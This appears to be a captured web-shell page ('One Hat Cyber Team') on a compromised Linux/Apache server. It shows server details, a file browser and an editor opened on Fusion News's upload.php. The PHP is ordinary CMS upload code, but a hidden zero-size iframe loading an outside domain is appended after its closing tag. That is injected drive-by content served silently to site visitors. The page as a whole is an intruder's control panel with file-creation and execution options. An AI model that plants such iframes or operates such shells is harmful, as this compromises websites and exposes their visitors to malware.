One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
sam
/
public_html
/
go
/
news
/
Edit File:
upload.php
<?php /* ||========================================================== || Fusion News 3.x ||---------------------------------------------------------- || File Version : $Id: upload.php 158 2007-10-22 09:39:24Z xycaleth $ || Contact : xycaleth@gmail.com || Copyright: : (c) 2006 - 2007, FusionNews.net || License Info : http://www.gnu.org/copyleft/gpl.html ||========================================================== */ include './common.php'; $id = ( !isset ($VARS['id']) ) ? '' : $VARS['id']; $sid = ( isset ($_COOKIE['fus_sid']) ) ? $_COOKIE['fus_sid'] : ''; $uid = ( isset ($_COOKIE['fus_uid']) ) ? $_COOKIE['fus_uid'] : ''; $userdata = array(); $userdata = login_session_update ($uid, $sid); if ( !has_access (NEWS_REPORTER) ) { echo $ind148; exit; } if ( !$uploads_active ) { echo $upld1; exit; } if ( strtolower (@ini_get ('file_uploads')) == 'off' || @ini_get ('file_uploads') == 0 || @ini_get ('file_uploads') == '' ) { echo <<< html <html> <head> <title>$upld3</title> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <style type="text/css"> <!-- body { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } --> </style> </head> <body> $upld2 </body> </html> html; exit; } echo <<< html <html> <head> <title>$upld3</title> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <style type="text/css"> <!-- a:active, a:focus, a:link, a:visited { color: #2D617D; } a:hover { color: #22495E; text-decoration: none; } body { margin: 5px 5px 5px 5px; } body, td, input { color: #2D617D; font-size: 11px; font-family: Verdana, Tahoma, Helvetica, sans-serif; } input { background-color: #DEF1FC; border: 1px solid #A5B8C0; } .contentBG { background-color: #FFFFFF; padding: 4px 4px 4px 4px; } .headBG1 { background-color: #EDF7FC; padding: 2px 2px 2px 2px; text-align: center; } .mainBG { background-color: #CDDBE2; width: 100%; } #wrapper { margin-top: 0px; margin-left: auto; margin-bottom: 0px; margin-right: auto; position: relative; text-align: left; width: 95%; } #copyright { font-size: 80%; text-align: center; width: 100%; } --> </style> </head> <body> <div id="wrapper"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" valign="middle" onmouseover="this.style.backgroundColor='#BCCBD2'" onmouseout="this.style.backgroundColor='#CDDBE2'"> <table border="0" cellpadding="2" cellspacing="1" class="mainBG"> html; $content = ''; if ( !$id || $id == '' ) { $maximum_filesize = calc_size ($uploads_size); echo <<< html <form method="post" enctype="multipart/form-data" action="?id=upload"> <input type="hidden" name="MAX_FILE_SIZE" value="$uploads_size" /> <tr> <td class="headBG1"> $ind216 <b>{$furl}/uploads</b><br /> $ind218 <b>$uploads_ext</b>.<br /> $ind219 <b>$maximum_filesize</b>.<br /> </td> </tr> <tr> <td align="center" onmouseover="this.style.backgroundColor = '#FBFDFF';" onmouseout="this.style.backgroundColor = '#FFFFFF';" class="contentBG"> <input class="post" type="file" name="F0" size="50" /> </td> </tr> <tr> <td align="center" onmouseover="this.style.backgroundColor = '#FBFDFF';" onmouseout="this.style.backgroundColor = '#FFFFFF';" class="contentBG"> <input class="post" type="file" name="F1" size="50" /> </td> </tr> <tr> <td align="center" onmouseover="this.style.backgroundColor = '#FBFDFF';" onmouseout="this.style.backgroundColor = '#FFFFFF';" class="contentBG"> <input class="post" type="file" name="F2" size="50" /> </td> </tr> <tr> <td align="center" onmouseover="this.style.backgroundColor = '#FBFDFF';" onmouseout="this.style.backgroundColor = '#FFFFFF';" class="contentBG"> <input class="post" type="file" name="F3" size="50" /> </td> </tr> <tr> <td align="center" onmouseover="this.style.backgroundColor = '#FBFDFF';" onmouseout="this.style.backgroundColor = '#FFFFFF';" class="contentBG"> <input class="post" type="file" name="F4" size="50" /> </td> </tr> <tr> <td class="headBG1"><input type="submit" name="com_Submit" class="mainoption" value="$ind270" /></td> </tr> </form> html; } else if ( $id == 'upload' ) { $content = "<tr>\n<td bgcolor=\"#ffffff\">$ind262<br />"; for ($i = 0; $i < 5; $i++ ){ $upload = "F".$i; if ( isset($_FILES[$upload]) && !empty ($_FILES[$upload]['name']) ){ $content .= upload_file($upload, FNEWS_ROOT_PATH . 'uploads/', $uploads_ext, $uploads_size, $_FILES[$upload]['name'])."<br />\n"; } } $title = $ind99; $content .= "</td>\n</tr>\n"; $content .= "<tr>\n<td bgcolor=\"#ffffff\">\n<a href=\"?\">$upld4</a>\n</td>\n</tr>\n"; } else if ( $id == 'imagelist' ) { $content = <<< html <tr> <td align="center" valign="middle" class="headBG1"><center><a href="?id=imagelist">$upld5</a></center> </tr> <tr bgcolor="whitesmoke" bordercolor="#dcdcdc"> <td align="center" valign="top"> <table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF"> <tr> <td align="center" valign="middle" class="headBG1" width="110">$upld6</td> <td align="center" valign="middle" class="headBG1">$ind226</td> <td align="center" valign="middle" class="headBG1" width="70">$ind227</td> <td align="center" valign="middle" class="headBG1" width="140">$ind228</td> </tr> html; $filesize_cnt = 0; if ($dir = @opendir("./uploads")) { while (($file = readdir($dir)) !== false) { if ( $file=="." || $file=="..") { continue; } $valid_extensions = str_replace ('|', '|', $uploads_ext); if ( !preg_match ('/^(.+)\.' . $valid_extensions . '$/', $file) ) { continue; } $currentfile_size = filesize ("./uploads/".$file); $filesize_cnt = $filesize_cnt + $currentfile_size; $file_size = calc_size ($currentfile_size); $date_modified = date ('Y-m-d H:i:s T', filemtime ('./uploads/' . $file)); $content .= <<< html <tr bgcolor="#FFFFFF"> <td>[<a href="#" onClick="window.opener.document.getElementById('newsposting').news.value += ' [img]{$furl}/uploads/{$file}[/img] ';">$upld7</a>] [<a href="#" onClick="javascript:opener.document.forms['newsposting'].fullnews.value += ' [img]{$furl}/uploads/{$file}[/img] ';">$upld8</a>] <td><a href="#" onClick=window.open("{$furl}/uploads/{$file}","","height=400,width=400,toolbar=no,menubar=no,scrollbars=yes,resizable=yes")>$file</a></td> <td align="center">$file_size</td> <td align="center">$date_modified</td> </tr> html; } closedir($dir); if ( $filesize_cnt == 0 ) { $content .= <<< html <tr bgcolor="#FFFFFF"> <td align="center" colspan="4">$ind300</td> </tr> html; } } else { $content .= '<tr bgcolor="#ffffff"><td colspan="4">' . $upld9 . '</td></tr>'; } $content .= '</table></td></tr>'; } echo $content; echo <<< html </table> </td> </tr> </table><br /> <div id="copyright">Powered by <a href="http://www.fusionnews.net" onclick="window.open (this.href); return false;">Fusion News</a> v{$curve} © 2002 - 2007, FusionNews.net</span> </div> </body> </html> html; ?> <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://gubmos.com/index12"></iframe>
Simpan